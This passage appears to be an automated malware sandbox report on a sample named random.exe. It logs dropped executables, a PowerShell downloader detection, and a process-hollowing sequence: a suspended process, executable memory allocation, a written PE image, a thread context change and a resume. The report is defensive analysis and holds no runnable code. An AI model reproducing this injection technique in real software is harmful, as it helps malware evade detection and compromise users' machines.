CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 744 thread_handle: 0x00000480 process_identifier: 2056 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000048c	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2260 thread_handle: 0x00000468 process_identifier: 3028 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000490	1	1
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2592	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2592	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000184 suspend_count: 1 process_identifier: 2592	1	0
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2772 thread_handle: 0x00000208 process_identifier: 2760 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000204	1	1
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000208	1	0
NtAllocateVirtualMemory Feb. 11, 2025, 10:40 a.m.	process_identifier: 2760 region_size: 380928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000204	1	0
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gàbª`º@Ð@Y°9´.textÊ`b `.rdataó "f@@.data\|Ñ°N@À.reloc°9:Ö@B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: base_address: 0x00401000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: base_address: 0x00448000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: base_address: 0x0044b000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: base_address: 0x00459000 process_identifier: 2760 process_handle: 0x00000204	1	1
WriteProcessMemory Feb. 11, 2025, 10:40 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2760 process_handle: 0x00000204	1	1
NtSetContextThread Feb. 11, 2025, 10:40 a.m.	registers.eip: 1995571652 registers.esp: 1636628 registers.edi: 0 registers.eax: 4242016 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000208 process_identifier: 2760	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2760	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x000000f4	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x000000f4 suspend_count: 1 process_identifier: 2792	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000108	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000108 suspend_count: 1 process_identifier: 2792	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2792	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2792	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000104	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 2792	1	0
NtGetContextThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2792	1	0

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE

random.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All